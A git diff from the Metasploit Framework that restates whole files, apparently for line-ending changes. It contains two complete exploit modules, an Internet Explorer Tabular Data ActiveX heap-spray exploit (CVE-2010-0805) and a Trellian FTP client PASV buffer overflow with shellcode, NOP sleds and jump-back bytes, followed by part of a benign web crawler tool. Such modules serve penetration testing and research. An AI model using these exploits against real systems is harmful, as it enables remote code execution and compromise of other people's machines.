-			'Description'    => %q{
-					This module exploits a memory corruption vulnerability in the Internet Explorer
-				Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet 
-				Explorer are vulnerable.
-
-				By specifying a long value as the "DataURL" parameter to this control, it is possible
-				to write a NUL byte outside the bounds of an array. By targeting control flow data
-				on the stack, an attacker can execute arbitrary code.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
-				[
-					'Anonymous',  # original discovery
-					'jduck'       # metasploit version
-				],
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2010-0805' ],
-					[ 'OSVDB', '63329' ],
-					[ 'BID', '39025' ],
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
-					[ 'MSB', 'MS10-018' ]
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-					'InitialAutoRunScript' => 'migrate -f',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "", #"\x00\x09\x0a\x0d'\\",
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Automatic (Heap Spray)',
-						{
-							'Ret' => 0x0c0c0c0c
-						}
-					],
-				],
-			'DisclosureDate' => 'Mar 09 2010',
-			'DefaultTarget'  => 0))
-	end
-
-
-	def on_request_uri(cli, request)
-
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
-		# Set the return\nops
-		ret  	    = Rex::Text.to_unescape([target.ret].pack('V'))
-
-		# ActiveX parameters
-		#progid =
-		clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
-
-		# exploit url
-		url = "http://"
-		#url << rand_text_alphanumeric(258)
-		url << rand_text_alphanumeric(258+0x116+2)
-
-		# Construct the final page
-		var_unescape   = rand_text_alpha(rand(100) + 1)
-		var_shellcode  = rand_text_alpha(rand(100) + 1)
-		var_memory     = rand_text_alpha(rand(100) + 1)
-		var_spray      = rand_text_alpha(rand(100) + 1)
-		var_i          = rand_text_alpha(rand(100) + 1)
-
-		html = %Q|<html><body>
-<script>
-var #{var_memory} = new Array();
-var #{var_unescape} = unescape;
-var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-var #{var_spray} = #{var_unescape}("#{ret * 2}");
-do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
-for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
-</script>
-<object classid='clsid:#{clsid}'>
-<param name='DataURL' value='#{url}'/>
-</object>
-</body></html>
-|
-
-		# Transmit the compressed response to the client
-		send_response(cli, html, { 'Content-Type' => 'text/html' })
-
-		# Handle the payload
-		handler(cli)
-
-	end
-
-end
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
+			'Description'    => %q{
+					This module exploits a memory corruption vulnerability in the Internet Explorer
+				Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet 
+				Explorer are vulnerable.
+
+				By specifying a long value as the "DataURL" parameter to this control, it is possible
+				to write a NUL byte outside the bounds of an array. By targeting control flow data
+				on the stack, an attacker can execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Anonymous',  # original discovery
+					'jduck'       # metasploit version
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2010-0805' ],
+					[ 'OSVDB', '63329' ],
+					[ 'BID', '39025' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ],
+					[ 'MSB', 'MS10-018' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "", #"\x00\x09\x0a\x0d'\\",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic (Heap Spray)',
+						{
+							'Ret' => 0x0c0c0c0c
+						}
+					],
+				],
+			'DisclosureDate' => 'Mar 09 2010',
+			'DefaultTarget'  => 0))
+	end
+
+
+	def on_request_uri(cli, request)
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+		# Set the return\nops
+		ret  	    = Rex::Text.to_unescape([target.ret].pack('V'))
+
+		# ActiveX parameters
+		#progid =
+		clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83"
+
+		# exploit url
+		url = "http://"
+		#url << rand_text_alphanumeric(258)
+		url << rand_text_alphanumeric(258+0x116+2)
+
+		# Construct the final page
+		var_unescape   = rand_text_alpha(rand(100) + 1)
+		var_shellcode  = rand_text_alpha(rand(100) + 1)
+		var_memory     = rand_text_alpha(rand(100) + 1)
+		var_spray      = rand_text_alpha(rand(100) + 1)
+		var_i          = rand_text_alpha(rand(100) + 1)
+
+		html = %Q|<html><body>
+<script>
+var #{var_memory} = new Array();
+var #{var_unescape} = unescape;
+var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
+var #{var_spray} = #{var_unescape}("#{ret * 2}");
+do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 );
+for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
+</script>
+<object classid='clsid:#{clsid}'>
+<param name='DataURL' value='#{url}'/>
+</object>
+</body></html>
+|
+
+		# Transmit the compressed response to the client
+		send_response(cli, html, { 'Content-Type' => 'text/html' })
+
+		# Handle the payload
+		handler(cli)
+
+	end
+
+end
diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb
index 86d3e825da..5780eb7c2f 100644
--- a/modules/exploits/windows/ftp/trellian_client_pasv.rb
+++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb
@@ -1,93 +1,93 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::TcpServer
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered 
-				through an excessively long PASV message.
-			},
-			'Author' 	 =>
-				[
-					'zombiefx',  # Original exploit author
-					'dookie'     # MSF module author
-				],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'seh',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 900,
-					'BadChars' => "\x00\x29\x2c\x2e",
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd  p/p/r in ftp.exe
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'April 11 2010',
-			'DefaultTarget'  => 0))
-
-		register_options(
-			[
-				OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
-			], self.class)
-	end
-
-	def on_client_connect(client)
-		return if ((p = regenerate_payload(client)) == nil)
-
-		# Let the client log in
-		client.get_once
-
-		user = "331 Please specify the password.\r\n"
-		client.put(user)
-
-		client.get_once
-		pass = "230 Login successful.\r\n"
-		client.put(pass)
-
-		# Handle the clients PWD command
-		client.get_once
-		pwd = "257 \"/\" is current directory.\r\n"
-		client.put(pwd)
-		client.get_once
-
-		sploit = "227 Entering Passive Mode ("
-		sploit << rand_text_alpha_upper(2171)
-		sploit << make_nops(100)
-		sploit << payload.encoded
-		sploit << make_nops(900 - (payload.encoded.length))
-		sploit << "\xe9\x18\xfc\xff\xff"  # Jump back 1000 bytes
-		sploit << "\xeb\xf9\x90\x90"      # Jump back 7 bytes
-		sploit << [target.ret].pack("A3")
-		sploit << ")\r\n"
-
-		client.put(sploit)
-
-	end
-
-end
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::TcpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Trellian FTP Client 3.01 PASV Remote Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered 
+				through an excessively long PASV message.
+			},
+			'Author' 	 =>
+				[
+					'zombiefx',  # Original exploit author
+					'dookie'     # MSF module author
+				],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'URL', 'http://www.exploit-db.com/exploits/12152' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 900,
+					'BadChars' => "\x00\x29\x2c\x2e",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP Universal', { 'Ret' => "\xfd\x21\x40" } ], # 0x004021fd  p/p/r in ftp.exe
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'April 11 2010',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
+			], self.class)
+	end
+
+	def on_client_connect(client)
+		return if ((p = regenerate_payload(client)) == nil)
+
+		# Let the client log in
+		client.get_once
+
+		user = "331 Please specify the password.\r\n"
+		client.put(user)
+
+		client.get_once
+		pass = "230 Login successful.\r\n"
+		client.put(pass)
+
+		# Handle the clients PWD command
+		client.get_once
+		pwd = "257 \"/\" is current directory.\r\n"
+		client.put(pwd)
+		client.get_once
+
+		sploit = "227 Entering Passive Mode ("
+		sploit << rand_text_alpha_upper(2171)
+		sploit << make_nops(100)
+		sploit << payload.encoded
+		sploit << make_nops(900 - (payload.encoded.length))
+		sploit << "\xe9\x18\xfc\xff\xff"  # Jump back 1000 bytes
+		sploit << "\xeb\xf9\x90\x90"      # Jump back 7 bytes
+		sploit << [target.ret].pack("A3")
+		sploit << ")\r\n"
+
+		client.put(sploit)
+
+	end
+
+end
diff --git a/tools/msfcrawler.rb b/tools/msfcrawler.rb
index b6ae264bc0..21883554e6 100755
--- a/tools/msfcrawler.rb
+++ b/tools/msfcrawler.rb
@@ -1,69 +1,69 @@
-#!/usr/bin/env ruby
-#
-# Web Crawler. 
-#
-# Author: et [at] metasploit.com 2010
-#
-#
-
-# openssl before rubygems mac os
-require 'openssl'
-require 'rubygems'
+#!/usr/bin/env ruby
+#
+# Web Crawler. 
+#
+# Author: et [at] metasploit.com 2010
+#
+#
+
+# openssl before rubygems mac os
+require 'openssl'
+require 'rubygems'
 require 'rinda/tuplespace'
-require 'pathname'
-require 'uri'
-
-begin
-	require 'sqlite3'
-rescue LoadError
-	puts "Error: sqlite3-ruby not found"
-end
-	
-msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
-$:.unshift(File.join(File.dirname(msfbase), '..', 'lib'))
-
-require 'rex'
-require 'msf/ui'
-require 'msf/base'
-
-
-# Sleep time (secs) between requests
-$sleeptime = 0
-
-# Timeout for loop ending
-$taketimeout = 15
-
-# Read timeout (-1 forever)
-$readtimeout = -1	
-
-# Directory containing crawler modules
-$crawlermodulesdir =  File.join(File.dirname(msfbase),"..", "data", "msfcrawler")
-
-# Database
-$dbpathmsf = File.join(Msf::Config.get_config_root, 'sqlite3.db')
-
-# Store in database?
-$dbs = false
-
-# Thread number
-$threadnum = 20
-
-# Dont crawl
-$dontcrawl = ".exe,.zip,.tar,.bz2,.run,.asc,.gz,"
-
-# Use proxy
-$useproxy = false
-
-# Proxy host
-$proxyhost = '127.0.0.1'
-
-# Proxy Port
-$proxyport = 8080
-
-# Cookie Jar
-$cookiejar = {}
-
-# Verbose
+require 'pathname'
+require 'uri'
+
+begin
+	require 'sqlite3'
+rescue LoadError
+	puts "Error: sqlite3-ruby not found"
+end
+	
+msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
+$:.unshift(File.join(File.dirname(msfbase), '..', 'lib'))
+
+require 'rex'
+require 'msf/ui'
+require 'msf/base'
+
+
+# Sleep time (secs) between requests
+$sleeptime = 0
+
+# Timeout for loop ending
+$taketimeout = 15
+
+# Read timeout (-1 forever)
+$readtimeout = -1	
+
+# Directory containing crawler modules
+$crawlermodulesdir =  File.join(File.dirname(msfbase),"..", "data", "msfcrawler")
+
+# Database
+$dbpathmsf = File.join(Msf::Config.get_config_root, 'sqlite3.db')
+
+# Store in database?
+$dbs = false
+
+# Thread number
+$threadnum = 20
+
+# Dont crawl
+$dontcrawl = ".exe,.zip,.tar,.bz2,.run,.asc,.gz,"
+
+# Use proxy
+$useproxy = false
+
+# Proxy host
+$proxyhost = '127.0.0.1'
+
+# Proxy Port
+$proxyport = 8080
+
+# Cookie Jar
+$cookiejar = {}
+
+# Verbose
 $verbose = false
 
 # Enable URI Limits
@@ -72,126 +72,126 @@ $enableul = true
 # Maximum number of requests per URI (check $enableul)
 $maxurilimit = 1
 
-
-
-class HttpCrawler
-	attr_accessor :ctarget, :cport, :cinipath, :cssl, :proxyhost, :proxyport, :useproxy
-
-	def initialize(target,port,inipath,ssl,proxyhost,proxyport,useproxy)
-		self.ctarget = target
-		self.cport = port
-		self.cssl = ssl
-		
-		self.useproxy = useproxy
-		self.proxyhost = proxyhost
-		self.proxyport = proxyport
-		
-		self.cinipath = (inipath.nil? or inipath.empty?) ? '/' : inipath
-					
-		inireq = {
-				'rhost'		=> self.ctarget,
-				'rport'		=> self.cport,
-				'uri' 		=> self.cinipath,
-				'method'   	=> 'GET',
-				'ctype'		=> 'text/plain',
-				'ssl'		=> self.cssl,
-				'query'		=> nil,
-				'data'		=> nil
-		}
-	
-	
-		@NotViewedQueue = Rinda::TupleSpace.new
+
+
+class HttpCrawler
+	attr_accessor :ctarget, :cport, :cinipath, :cssl, :proxyhost, :proxyport, :useproxy
+
+	def initialize(target,port,inipath,ssl,proxyhost,proxyport,useproxy)
+		self.ctarget = target
+		self.cport = port
+		self.cssl = ssl
+		
+		self.useproxy = useproxy
+		self.proxyhost = proxyhost
+		self.proxyport = proxyport
+		
+		self.cinipath = (inipath.nil? or inipath.empty?) ? '/' : inipath
+					
+		inireq = {
+				'rhost'		=> self.ctarget,
+				'rport'		=> self.cport,
+				'uri' 		=> self.cinipath,
+				'method'   	=> 'GET',
+				'ctype'		=> 'text/plain',
+				'ssl'		=> self.cssl,
+				'query'		=> nil,
+				'data'		=> nil
+		}
+	
+	
+		@NotViewedQueue = Rinda::TupleSpace.new
 		@ViewedQueue = Hash.new
-		@UriLimits = Hash.new
-		
-		insertnewpath(inireq)
-			
-		puts "Loading modules: #{$crawlermodulesdir}"
-		load_modules
-		puts "OK"
-	end
-	
-	def reqtemplate(target,port,ssl)
-		hreq = {
-			'rhost'		=> target,
-			'rport'		=> port,
-			'uri'  		=> nil,
-			'method'   	=> nil,
-			'ctype'		=> nil,
-			'ssl'		=> ssl,
-			'query'		=> nil,
-			'data'		=> nil	
-		}
-
-		return hreq
-	end
-	
-	def storedb(hashreq,response,dbpath)
-		#postgres , pg gem
-	
-		db = SQLite3::Database.new(dbpath)
-		#db = Mysql.new("127.0.0.1", username, password, databasename)
-		until !db.transaction_active?
-			#puts "Waiting for db"
-			#wait
-		end
-		#puts "db: #{db.transaction_active?}"
-		
-		#CREATE TABLE "wmap_requests" (
-		# "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, 
-		# "host" varchar(255), 
-		# "address" varchar(16), 
-		# "address6" varchar(255), 
-		# "port" integer, 
-		# "ssl" integer, 
-		# "meth" varchar(32), 
-		# "path" text, 
-		# "headers" text, 
-		# "query" text, 
-		# "body" text, 
-		# "respcode" varchar(16), 
-		# "resphead" text, 
-		# "response" text, 
-		# "created_at" datetime);
-		
-
-		db.transaction db.execute( "insert into wmap_requests (host,address,address6,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created_at,updated_at) values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)",
-			hashreq['rhost'],
-			hashreq['rhost'],
-			hashreq['rhost'], 
-			hashreq['rport'].to_i,
-			hashreq['ssl']? 1:0,
-			hashreq['method'],
-			SQLite3::Blob.new(hashreq['uri']),
-			SQLite3::Blob.new(''),
-			SQLite3::Blob.new(hashreq['query']? hashreq['query']:''),
-			SQLite3::Blob.new(hashreq['data']? hashreq['data']:''),
-			response.code.to_s,
-			SQLite3::Blob.new(''),
-			SQLite3::Blob.new(response.body.to_s),
-			Time.new,
-			Time.new
-		) 
-		db.commit
-		
-		db.close
-	end
-	
-	def run
-		i, a = 0, []
-		
-		
-	
-		begin
-			reqfilter = reqtemplate(self.ctarget,self.cport,self.cssl)
-								
-			loop do
-				
-				####
-				#if i <= $threadnum
-				#	a.push(Thread.new {
-				####
-			
+		@UriLimits = Hash.new
+		
+		insertnewpath(inireq)
+			
+		puts "Loading modules: #{$crawlermodulesdir}"
+		load_modules
+		puts "OK"
+	end
+	
+	def reqtemplate(target,port,ssl)
+		hreq = {
+			'rhost'		=> target,
+			'rport'		=> port,
+			'uri'  		=> nil,
+			'method'   	=> nil,
+			'ctype'		=> nil,
+			'ssl'		=> ssl,
+			'query'		=> nil,
+			'data'		=> nil	
+		}
+
+		return hreq
+	end
+	
+	def storedb(hashreq,response,dbpath)
+		#postgres , pg gem
+	
+		db = SQLite3::Database.new(dbpath)
+		#db = Mysql.new("127.0.0.1", username, password, databasename)
+		until !db.transaction_active?
+			#puts "Waiting for db"
+			#wait
+		end
+		#puts "db: #{db.transaction_active?}"
+		
+		#CREATE TABLE "wmap_requests" (
+		# "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, 
+		# "host" varchar(255), 
+		# "address" varchar(16), 
+		# "address6" varchar(255), 
+		# "port" integer, 
+		# "ssl" integer, 
+		# "meth" varchar(32), 
+		# "path" text, 
+		# "headers" text, 
+		# "query" text, 
+		# "body" text, 
+		# "respcode" varchar(16), 
+		# "resphead" text, 
+		# "response" text, 
+		# "created_at" datetime);
+		
+
+		db.transaction db.execute( "insert into wmap_requests (host,address,address6,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created_at,updated_at) values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)",
+			hashreq['rhost'],
+			hashreq['rhost'],
+			hashreq['rhost'], 
+			hashreq['rport'].to_i,
+			hashreq['ssl']? 1:0,
+			hashreq['method'],
+			SQLite3::Blob.new(hashreq['uri']),
+			SQLite3::Blob.new(''),
+			SQLite3::Blob.new(hashreq['query']? hashreq['query']:''),
+			SQLite3::Blob.new(hashreq['data']? hashreq['data']:''),
+			response.code.to_s,
+			SQLite3::Blob.new(''),
+			SQLite3::Blob.new(response.body.to_s),
+			Time.new,
+			Time.new
+		) 
+		db.commit
+		
+		db.close
+	end
+	
+	def run
+		i, a = 0, []
+		
+		
+	
+		begin
+			reqfilter = reqtemplate(self.ctarget,self.cport,self.cssl)
+								
+			loop do
+				
+				####
+				#if i <= $threadnum
+				#	a.push(Thread.new {
+				####
+			
 				hashreq = @NotViewedQueue.take(reqfilter, $taketimeout)
 				
 				ul = false				
@@ -203,210 +203,210 @@ class HttpCrawler
 					end
  				else
 					@UriLimits[hashreq['uri']] = 0	
-				end
-									
-				if !@ViewedQueue.include?(hashsig(hashreq)) and !ul 
-							
+				end
+									
+				if !@ViewedQueue.include?(hashsig(hashreq)) and !ul 
+							
 					@ViewedQueue[hashsig(hashreq)] = Time.now
 					@UriLimits[hashreq['uri']] += 1
 					
-					if !File.extname(hashreq['uri']).empty? and $dontcrawl.include? File.extname(hashreq['uri'])
-						if $verbose
-							puts "URI not crawled #{hashreq['uri']}"
-						end
-					else	 
-							
-							prx = nil
-							if self.useproxy
-								prx = "HTTP:"+self.proxyhost.to_s+":"+self.proxyport.to_s
-							end
-
-							c = Rex::Proto::Http::Client.new(
-								self.ctarget,
-								self.cport.to_i,
-								{},
-								self.cssl,
-								nil,
-								prx
-							)
-
-							sendreq(c,hashreq)
-							
-						
-
-					end		
-				else
-					if $verbose
-						puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}"
-					end
-				end
-				
-				####
-				#})
-
-				#i += 1	
-				#else
-				#	sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty?
-				#	i = 0
-				#end
-				####
-					
-			end	 												
-		rescue Rinda::RequestExpiredError
-			puts "END."
-			return
-		end
-	end
-		
-	#
-	# Modified version of load_protocols from psnuffle by Max Moser  <mmo@remote-exploit.org>
-	#
-	def load_modules
-		base = $crawlermodulesdir
-		if (not File.directory?(base))
-			raise RuntimeError,"The Crawler modules parameter is set to an invalid directory"
-		end
-		
-		@crawlermodules = {}
-		cmodules = Dir.new(base).entries.grep(/\.rb$/).sort
-		cmodules.each do |n|
-			f = File.join(base, n)
-			m = ::Module.new
-			begin
-				m.module_eval(File.read(f, File.size(f)))
-				m.constants.grep(/^Crawler(.*)/) do
-					cmod = $1
-					klass = m.const_get("Crawler#{cmod}")
-					@crawlermodules[cmod.downcase] = klass.new(self)
-					
-					puts("Loaded crawler module #{cmod} from #{f}...")
-				end
-			rescue ::Exception => e
-				puts("Crawler module #{n} failed to load: #{e.class} #{e} #{e.backtrace}")
-			end
-		end
-	end
-	
-	def sendreq(nclient,reqopts={})		
-		
-		begin
-						
-			r = nclient.request_raw(reqopts)
-			resp = nclient.send_recv(r, $readtimeout)
-			while(resp and resp.code == 100)
-				resp = nclient.reread_response(resp, $readtimeout)
-			end			
-			
-			if resp
-				#
-				# Quickfix for bug packet.rb to_s line: 190
-				# In case modules or crawler calls to_s on de-chunked responses 
-				#
-				resp.transfer_chunked = false
-				if resp['Set-Cookie']
-					#puts "Set Cookie: #{resp['Set-Cookie']}"
-					#puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}"
-					#$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie']		
-				end
-				
-				if $dbs
-					storedb(reqopts,resp,$dbpathmsf)
-				end
-				
-				puts ">> [#{resp.code}] #{reqopts['uri']}"
-		
-				if reqopts['query'] and !reqopts['query'].empty?
-					puts ">>> [Q] #{reqopts['query']}" 
-				end
-
-				if reqopts['data'] 
-					puts ">>> [D] #{reqopts['data']}" 
-				end
-				
-				case resp.code
-				when 200
-					@crawlermodules.each_key do |k|
-						@crawlermodules[k].parse(reqopts,resp)
-					end
-				when 301..303
-					puts "[#{resp.code}] Redirection to: #{resp['Location']}"
-					if $verbose
-						puts urltohash('GET',resp['Location'],reqopts['uri'],nil)
-					end
-					insertnewpath(urltohash('GET',resp['Location'],reqopts['uri'],nil))
-				when 404
-					puts "[404] Invalid link #{reqopts['uri']}"	
-				else
-					puts "Unhandled #{resp.code}"
-				end	
-				
-			else
-				puts "No response"
-			end
-			sleep($sleeptime)			
-		rescue
-			puts "ERROR"
-			if $verbose
-				puts "#{$!}: #{$!.backtrace}"
-			end
-		end
-	end
-
-	#
-	# Add new path (uri) to test non-viewed queue
-	#
+					if !File.extname(hashreq['uri']).empty? and $dontcrawl.include? File.extname(hashreq['uri'])
+						if $verbose
+							puts "URI not crawled #{hashreq['uri']}"
+						end
+					else	 
+							
+							prx = nil
+							if self.useproxy
+								prx = "HTTP:"+self.proxyhost.to_s+":"+self.proxyport.to_s
+							end
+
+							c = Rex::Proto::Http::Client.new(
+								self.ctarget,
+								self.cport.to_i,
+								{},
+								self.cssl,
+								nil,
+								prx
+							)
+
+							sendreq(c,hashreq)
+							
+						
+
+					end		
+				else
+					if $verbose
+						puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}"
+					end
+				end
+				
+				####
+				#})
+
+				#i += 1	
+				#else
+				#	sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty?
+				#	i = 0
+				#end
+				####
+					
+			end	 												
+		rescue Rinda::RequestExpiredError
+			puts "END."
+			return
+		end
+	end
+		
+	#
+	# Modified version of load_protocols from psnuffle by Max Moser  <mmo@remote-exploit.org>
+	#
+	def load_modules
+		base = $crawlermodulesdir
+		if (not File.directory?(base))
+			raise RuntimeError,"The Crawler modules parameter is set to an invalid directory"
+		end
+		
+		@crawlermodules = {}
+		cmodules = Dir.new(base).entries.grep(/\.rb$/).sort
+		cmodules.each do |n|
+			f = File.join(base, n)
+			m = ::Module.new
+			begin
+				m.module_eval(File.read(f, File.size(f)))
+				m.constants.grep(/^Crawler(.*)/) do
+					cmod = $1
+					klass = m.const_get("Crawler#{cmod}")
+					@crawlermodules[cmod.downcase] = klass.new(self)
+					
+					puts("Loaded crawler module #{cmod} from #{f}...")
+				end
+			rescue ::Exception => e
+				puts("Crawler module #{n} failed to load: #{e.class} #{e} #{e.backtrace}")
+			end
+		end
+	end
+	
+	def sendreq(nclient,reqopts={})		
+		
+		begin
+						
+			r = nclient.request_raw(reqopts)
+			resp = nclient.send_recv(r, $readtimeout)
+			while(resp and resp.code == 100)
+				resp = nclient.reread_response(resp, $readtimeout)
+			end			
+			
+			if resp
+				#
+				# Quickfix for bug packet.rb to_s line: 190
+				# In case modules or crawler calls to_s on de-chunked responses 
+				#
+				resp.transfer_chunked = false
+				if resp['Set-Cookie']
+					#puts "Set Cookie: #{resp['Set-Cookie']}"
+					#puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}"
+					#$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie']		
+				end
+				
+				if $dbs
+					storedb(reqopts,resp,$dbpathmsf)
+				end
+				
+				puts ">> [#{resp.code}] #{reqopts['uri']}"
+		
+				if reqopts['query'] and !reqopts['query'].empty?
+					puts ">>> [Q] #{reqopts['query']}" 
+				end
+
+				if reqopts['data'] 
+					puts ">>> [D] #{reqopts['data']}" 
+				end
+				
+				case resp.code
+				when 200
+					@crawlermodules.each_key do |k|
+						@crawlermodules[k].parse(reqopts,resp)
+					end
+				when 301..303
+					puts "[#{resp.code}] Redirection to: #{resp['Location']}"
+					if $verbose
+						puts urltohash('GET',resp['Location'],reqopts['uri'],nil)
+					end
+					insertnewpath(urltohash('GET',resp['Location'],reqopts['uri'],nil))
+				when 404
+					puts "[404] Invalid link #{reqopts['uri']}"	
+				else
+					puts "Unhandled #{resp.code}"
+				end	
+				
+			else
+				puts "No response"
+			end
+			sleep($sleeptime)			
+		rescue
+			puts "ERROR"
+			if $verbose
+				puts "#{$!}: #{$!.backtrace}"
+			end
+		end
+	end
+
+	#
+	# Add new path (uri) to test non-viewed queue
+	#
 	def insertnewpath(hashreq)
 
 		hashreq['uri'] = canonicalize(hashreq['uri'])
-
-		if hashreq['rhost'] == self.ctarget and hashreq['rport'] == self.cport
-			if !@ViewedQueue.include?(hashsig(hashreq)) 
-				if @NotViewedQueue.read_all(hashreq).size > 0
-					if $verbose
-						puts "Already in queue to be viewed"
-					end
-				else
-					if $verbose
-						puts "Inserted: #{hashreq['uri']}"
-					end
-					
-					@NotViewedQueue.write(hashreq)
-				end			
-			else
-				if $verbose
-					puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}"
-				end
-			end
-		end
-	end
-	
-	#
-	# Build a new hash for a local path
-	#
-	
+
+		if hashreq['rhost'] == self.ctarget and hashreq['rport'] == self.cport
+			if !@ViewedQueue.include?(hashsig(hashreq)) 
+				if @NotViewedQueue.read_all(hashreq).size > 0
+					if $verbose
+						puts "Already in queue to be viewed"
+					end
+				else
+					if $verbose
+						puts "Inserted: #{hashreq['uri']}"
+					end
+					
+					@NotViewedQueue.write(hashreq)
+				end			
+			else
+				if $verbose
+					puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}"
+				end
+			end
+		end
+	end
+	
+	#
+	# Build a new hash for a local path
+	#
+	
 	def urltohash(m,url,basepath,dat)
 			# m:   method
 			# url: uri?[query]
 			# basepath: base path/uri to determine absolute path when relative
 			# data: body data, nil if GET and query = uri.query
-		
-			uri = URI.parse(url)
-			uritargetssl = (uri.scheme == "https") ? true : false
+		
+			uri = URI.parse(url)
+			uritargetssl = (uri.scheme == "https") ? true : false
 						
 			uritargethost = uri.host
-			if (uri.host.nil? or uri.host.empty?) 
-				uritargethost = self.ctarget
-				uritargetssl = self.cssl
